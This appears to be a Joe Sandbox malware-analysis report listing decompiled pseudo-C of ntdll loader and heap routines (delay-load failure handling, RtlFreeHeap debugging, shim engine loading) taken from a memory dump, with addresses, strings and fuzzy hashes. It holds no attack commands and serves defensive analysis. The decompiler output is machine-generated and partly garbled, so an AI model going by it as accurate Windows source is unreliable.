0x36afd820
0x36afd822
0x36afd826
0x36afd829
0x00000000
0x36afd830
0x36afd833
0x36afd85d
0x36afd860
0x36b492e0
0x36b492e8
0x36afd941
0x36afd941
0x36afd949
0x36afd94f
0x36afd874
0x36afd874
0x36afd87a
0x36afd884
0x00000000
0x00000000
0x36afd886
0x36afd88b
0x36afd83e
0x36afd840
0x36afd891
0x36afd8a5
0x36afd8ac
0x36b4933a
0x36afd8dc
0x36afd8de
0x36b4935b
0x00000000
0x00000000
0x00000000
0x36b49361
0x36afd8e4
0x36afd8eb
0x00000000
0x00000000
0x00000000
0x36b49349
0x36b49349
0x36b4934d
0x00000000
0x36b4934d
0x36b4933a
0x36afd8b2
0x36afd8d2
0x36afd8d6
0x36afd8d8
0x36afd8da
0x00000000
0x36afd8da
0x36afd842
0x36afd842
0x00000000
0x36afd842
0x36afd955
0x36afd95a
0x00000000
0x36afd95a
0x36b492ee
0x36b492f2
0x00000000
0x00000000
0x36b492f8
0x36b492fb
0x36b49301
0x36b4931f
0x36b49321
0x00000000
0x00000000
0x36b49327
0x36b49327
0x36b4932c
0x00000000
0x36b4932c
0x36b49306
0x36b49313
0x36b4931c
0x00000000
0x36b4931c
0x36b49315
0x00000000
0x36b49315
0x36b49308
0x00000000
0x36b49308
0x36afd866
0x36afd869
0x00000000
0x00000000
0x36afd872
0x00000000
0x00000000
0x00000000
0x36afd872
0x36afd835
0x36afd838
0x36b49366
0x00000000
0x36b49366
0x00000000
0x36afd838
0x36afd830
0x36afd7ad
0x36b4917f
0x36b4917f
0x36afd7b3
0x36afd7b8
0x36b49188
0x00000000
0x00000000
0x36b49194
0x36b491a5
0x36b491ac
0x36b491ae
0x36b491b0
0x36b491b7
0x00000000
0x00000000
0x00000000
0x00000000
0x36b491bd
0x36b491bd
0x36b491c8
0x36b491ca
0x36b491d7
0x00000000
0x00000000
0x36b491e5
0x36b491e6
0x36b491ec
0x36b491f0
0x00000000
0x00000000
0x00000000
0x36b491f2
0x36afd7be
0x36afd7be
0x36afd7c2
0x36afd7c5
0x36b491f7
0x36b491fa
0x36b491fe
0x36b49213
0x36b49216
0x36b4921a
0x36b4921d
0x00000000
0x00000000
0x00000000
0x36b4921f
0x36b49224
0x36afd805
0x36afd807
0x36b49231
0x00000000
0x00000000
0x36b49237
0x36b4923d
0x36b49244
0x36b4924e
0x36b49254
0x36b4925c
0x36b49261
0x36b49261
0x36b4925c
0x36b4926d
0x36b4926f
0x36b49274
0x36b49286
0x36b49299
0x36b4929f
0x36b492a1
0x36b492aa
0x36b492ae
0x36b492b0
0x36b492b0
0x36b492ae
0x36b49274
0x36b492b6
0x36b492d9
0x36b492d9
0x00000000
0x36b492b6
0x00000000
0x36afd807
0x36afd7cb
0x36afd7d9
0x36afd7e0
0x36afd7e7
0x36afd7ee
0x36afd7fb
0x36afd800
0x36afd803
0x36afd803
0x00000000
0x36afd7b8
0x00000000
0x36afd790
0x00000000
0x36afd902
0x36afd6fb
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36B49299

Strings

RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36B49372
RtlpFindActivationContextSection_CheckParameters, xrefs: 36B4914E, 36B49173
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B49178
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B49153
Actx , xrefs: 36B49315
GsHd, xrefs: 36AFD794

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 7ce46b64f87bf420ed91978fea487784d81a129c2734a6f283aad8135d0ca027
Instruction ID: a9bf1a28f734459c38e2315d82a20a22e47146054ff8ff6b55c405be8a42dc9d
Opcode Fuzzy Hash: 7ce46b64f87bf420ed91978fea487784d81a129c2734a6f283aad8135d0ca027
Instruction Fuzzy Hash: 92E1A074A183119FE712EF25CC80B4AB7E4BB89358F505A6DF9558F281DB32E844CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36B5FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E36B5FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E36B5F899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x36bd37c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E36B5E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x36bd37c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x36bd391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x36bd91e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = L36B16010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x36bd91e0("true",  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

0x36b5fa10
0x36b5fa12
0x36b5fa18
0x36b5fa1d
0x36b5fa2b
0x36b5fa30
0x36b5fa35
0x36b5fa3a
0x36b5fa3c
0x36b5fa40
0x36b5fa42
0x36b5fa42
0x36b5fa47
0x36b5fa50
0x36b5fa51
0x36b5fa54
0x36b5fa6d
0x36b5fa72
0x36b5fa77
0x36b5fa7c
0x36b5fa7e
0x36b5fa7e
0x36b5fa81
0x36b5fa99
0x00000000
0x36b5fa83
0x36b5fa8a
0x36b5fa8d
0x36b5fa9b
0x36b5fa9b
0x00000000
0x36b5fa95
0x36b5fa95
0x36b5fa9d
0x36b5fa9d
0x36b5faa2
0x36b5fb01
0x36b5fb01
0x36b5fb06
0x36b5fb0a
0x36b5fb0c
0x36b5fb0c
0x36b5fb15
0x36b5fb1d
0x36b5fb1d
0x00000000
0x36b5faa8
0x36b5faae
0x36b5fab4
0x36b5faba
0x36b5fabd
0x36b5fac4
0x36b5fac7
0x36b5facf
0x36b5fad4
0x36b5fae5
0x36b5fae8
0x36b5fad6
0x36b5fad6
0x36b5fadd
0x36b5fadd
0x36b5faf3
0x36b5fafb
0x36b5faff
0x36b5fb21
0x36b5fb25
0x00000000
0x00000000
0x00000000
0x36b5faff
0x36b5faa2
0x36b5fa8d

APIs

RtlDebugPrintTimes.NTDLL ref: 36B5FAF3
RtlDebugPrintTimes.NTDLL ref: 36B5FB15

Strings

LdrpRedirectDelayloadFailure, xrefs: 36B5FA5E
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 36B5FA58
$, xrefs: 36B5FABD
minkernel\ntdll\ldrdload.c, xrefs: 36B5FA68
Unknown, xrefs: 36B5FA42, 36B5FA54

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 3bab520920cc536fcbfa69efb69e3e92c611f0944ced91c29a631592b31ea633
Instruction ID: 9aa5f4e876868891d3b2fa254780668988a62e87a7ccd247327d357d0e148d58
Opcode Fuzzy Hash: 3bab520920cc536fcbfa69efb69e3e92c611f0944ced91c29a631592b31ea633
Instruction Fuzzy Hash: AA415DB9E01219ABDB01DF95C994ADEBBBAFF48354F110069EA04A7340D775DE01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 36B8F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E36B8F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push("true");
				_push(0x36bbd2f8);
				E36B37BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E36AD7662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E36B8FBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E36AEFED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E36B90835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E36AD753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x36bd47d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E36AF3BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								E36B90D24( *((intOrPtr*)(_t165 - 0x30)));
								E36B90835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x36bd47d4;
							if( *0x36bd47d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E36B9D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E36B13AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x36bd47d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x36bd47d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E36ADB910();
								} else {
									E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E36B8823A(_t162,  *(_t165 - 0x20)));
								E36ADB910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x36bd47a1 = 1;
									 *0x36bd4100 = 0;
									asm("int3");
									 *0x36bd47a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E36ADB910();
						} else {
							E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E36ADB910("About to free block at %p\n",  *0x36bd47d0);
						goto L30;
					}
				} else {
					_t164 =  *0x36bd3750; // 0x0
					 *0x36bd91e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}

0x36b8f8f8
0x36b8f8fa
0x36b8f8ff
0x36b8f906
0x36b8f909
0x36b8f90b
0x36b8f910
0x36b8f912
0x36b8f915
0x36b8f91f
0x36b8f93e
0x36b8f941
0x36b8f94f
0x36b8f954
0x36b8f956
0x36b8fb8c
0x36b8fb8e
0x36b8fb91
0x36b8fb91
0x36b8fb94
0x36b8fb9b
0x36b8fba0
0x00000000
0x36b8fba0
0x36b8f95f
0x36b8f962
0x36b8f96c
0x36b8f96f
0x36b8f972
0x36b8f97a
0x36b8f97f
0x36b8f986
0x36b8f986
0x36b8f98b
0x36b8f98b
0x36b8f992
0x36b8f99a
0x36b8f99d
0x36b8f9a1
0x36b8f9aa
0x36b8f9aa
0x36b8f9aa
0x36b8f9ac
0x36b8f9af
0x36b8f9b7
0x36b8f9b9
0x36b8f9be
0x36b8f9c0
0x00000000
0x36b8f9c6
0x36b8f9c9
0x36b8f9cf
0x36b8f9d5
0x36b8fa1b
0x36b8fa1e
0x36b8fa21
0x36b8fa26
0x36b8fb2b
0x36b8fb37
0x36b8fb39
0x36b8fb41
0x36b8fb4b
0x00000000
0x36b8fb4b
0x36b8fa2c
0x36b8fa33
0x00000000
0x00000000
0x36b8fa39
0x36b8fa3c
0x36b8fa3f
0x36b8fa42
0x36b8fa47
0x36b8fa49
0x36b8fa4c
0x36b8fa51
0x36b8fa54
0x36b8fa56
0x36b8fa5b
0x36b8fa60
0x36b8fa60
0x36b8fa54
0x36b8fa63
0x36b8fa67
0x36b8fa79
0x36b8fa7c
0x36b8fa7f
0x36b8fa69
0x36b8fa6b
0x36b8fa70
0x36b8fa73
0x36b8fa73
0x36b8fa82
0x36b8fa84
0x36b8fa88
0x36b8fa8b
0x36b8fa8d
0x36b8fa90
0x36b8fa95
0x36b8fa9b
0x36b8fa9b
0x36b8fa9b
0x36b8fa9d
0x36b8faa0
0x36b8faa6
0x36b8faad
0x00000000
0x00000000
0x36b8fab3
0x36b8faba
0x00000000
0x00000000
0x36b8fabc
0x36b8fac2
0x36b8fac5
0x36b8fae4
0x36b8fae9
0x36b8fac7
0x36b8fadc
0x36b8fae1
0x36b8fafa
0x36b8fb03
0x36b8fb0b
0x36b8fb0b
0x36b8fb11
0x36b8fb15
0x36b8fb17
0x36b8fb1e
0x36b8fb24
0x36b8fb25
0x36b8fb25
0x36b8fb15
0x00000000
0x36b8faa0
0x36b8f9d7
0x36b8f9da
0x36b8f9f9
0x36b8f9fe
0x36b8f9dc
0x36b8f9f1
0x36b8f9f6
0x36b8fa0f
0x00000000
0x36b8fa15
0x36b8f921
0x36b8f926
0x36b8f92e
0x36b8f936
0x36b8fba2
0x36b8fba5
0x36b8fbb1
0x36b8fbb1

APIs

RtlDebugPrintTimes.NTDLL ref: 36B8F92E

Strings

HEAP[%wZ]: , xrefs: 36B8F9EC, 36B8FAD7
HEAP: , xrefs: 36B8F9F9, 36B8FAE4
About to free block at %p with tag %ws, xrefs: 36B8FAFE
About to free block at %p, xrefs: 36B8FA0A
RtlFreeHeap, xrefs: 36B8F948, 36B8F9B2

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 87afe7dd8c80dc91f60b65653bc625fc92bcdd7bc40a3114ff1d9bcbfe0a6d1a
Instruction ID: 89d47b101ec4ed7ada3768f03b3ab3b9f9a0419019ddf866f953cd3bde8ba9d6
Opcode Fuzzy Hash: 87afe7dd8c80dc91f60b65653bc625fc92bcdd7bc40a3114ff1d9bcbfe0a6d1a
Instruction Fuzzy Hash: DB71E075901695EFCB01CFA8C8A0AADFBF6FF49394F048099E845AB251CB399941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 36AD6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E36AD6565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x36bdb370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E36AFE8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x36bd9200; // 0x0
				_push("true");
				_pop(_t113);
				 *0x36bd65f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E36B0E7E0(_t92, _v92);
					}
					_t114 =  *0x36bd9210; // 0x0
					asm("ror esi, cl");
					 *0x36bd91e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x36bd9218; // 0x0
					_push("true");
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E36AEFED0(0x36bd32d8);
					_t98 = 0x36bd5d8c;
					if( *0x36bd65f0 != 0) {
						_t56 =  *0x36bd5d8c; // 0x68b2ce0
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x36bd5d8c; // 0x68b2ce0
						if( *0x36bd65f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x36bd65f0 = 1;
							 *0x36bd65f8 = 0;
							E36AEE740(_t98);
							E36AD676F(_t98);
							return E36B24B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x36bd32d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x68b2ca8
								_t98 =  *_t24;
								E36AD6704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x36bd5d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E36B25050(_t92,  &_v108, _t110);
					_t92 = E36AD6B45( &_v108,  &_v92, "true",  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x36bd37c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E36B5E692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x36bd37c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E36B17DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x36bd91e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E36AFD3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E36B016EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x36bd37c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E36B5E692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x36bd37c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E36B61D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E36B22C70();
						_push("true");
						_pop(_t113);
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_push("true");
				_pop(_t113);
				goto L8;
			}

0x36ad6574
0x36ad657d
0x36ad6581
0x36ad658b
0x36ad6590
0x36ad6598
0x36ad65a1
0x36ad65a3
0x36ad65a6
0x36ad65ad
0x36ad65b1
0x36ad65b3
0x36ad65b8
0x36ad6637
0x36ad6637
0x36ad663a
0x36ad663e
0x36ad66fa
0x36ad66fa
0x36ad664c
0x36ad6659
0x36ad665f
0x36ad6665
0x36ad6667
0x36ad666f
0x36ad6678
0x36ad667d
0x36ad6684
0x36ad6686
0x36ad6692
0x36ad6697
0x36b398c3
0x36b398d3
0x36b398d3
0x36b398d5
0x00000000
0x00000000
0x36b398ca
0x36b398cd
0x36b398cd
0x36b398cd
0x36b398d1
0x36b398d1
0x00000000
0x36ad669d
0x36ad669d
0x36ad66a4
0x36ad66aa
0x36ad66ac
0x36ad66ac
0x36ad66b0
0x36ad66c9
0x36ad66cb
0x36ad66d7
0x36ad66dc
0x36ad66e1
0x36ad66f6
0x36ad66b2
0x36ad66b2
0x36ad66b2
0x36ad66b5
0x36ad66b7
0x36ad66b7
0x36ad66ba
0x36ad66bf
0x36ad66c1
0x00000000
0x36ad66b2
0x36ad66b0
0x00000000
0x00000000
0x00000000
0x36ad65ba
0x36ad65ba
0x36ad65bf
0x36ad65d5
0x36ad65d9
0x36b39835
0x36b3983a
0x36b3983c
0x36b3983e
0x36b39859
0x36b3985e
0x36b39863
0x36b39863
0x36b39866
0x36b39868
0x36b3986a
0x36b3986a
0x36b3986d
0x00000000
0x36b3986d
0x36ad65e2
0x36ad65ec
0x36ad65f1
0x36ad65f4
0x36ad65f7
0x36ad65fb
0x36ad660f
0x36ad6614
0x36ad661a
0x36ad661c
0x36ad661f
0x00000000
0x36ad661f
0x36ad6602
0x36ad6606
0x36b39875
0x36b3987a
0x36b3987c
0x36b3987e
0x36b39880
0x36b3989a
0x36b3989f
0x36b398a4
0x36b398a7
0x36b398a9
0x36b398ab
0x36b398ab
0x36b398ac
0x36b398ae
0x36b398b3
0x36b398b4
0x36b398b6
0x36b398bb
0x36b398bd
0x00000000
0x36b398bd
0x36ad660c
0x00000000
0x36ad6624
0x36ad662a
0x36ad662f
0x36ad6634
0x36ad6636
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36AD6614
RtlDebugPrintTimes.NTDLL ref: 36AD665F

Strings

Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36B39843
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36B39885
LdrpLoadShimEngine, xrefs: 36B3984A, 36B3988B
minkernel\ntdll\ldrinit.c, xrefs: 36B39854, 36B39895

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 09721a73ee258f42f3e1a9357298fa003c5efa88dd195762a475d64aa6b40dc1
Instruction ID: 7c348d434b845ca1d71c477a7a85105122816916ab85d7f2892f7fedd2cac1b9
Opcode Fuzzy Hash: 09721a73ee258f42f3e1a9357298fa003c5efa88dd195762a475d64aa6b40dc1
Instruction Fuzzy Hash: F751E136E10358ABDB08EFA8CC64E9D7BB6AB40348F150165EA40BF296DB749C51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 36B0DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133
timeCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E36B0DA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
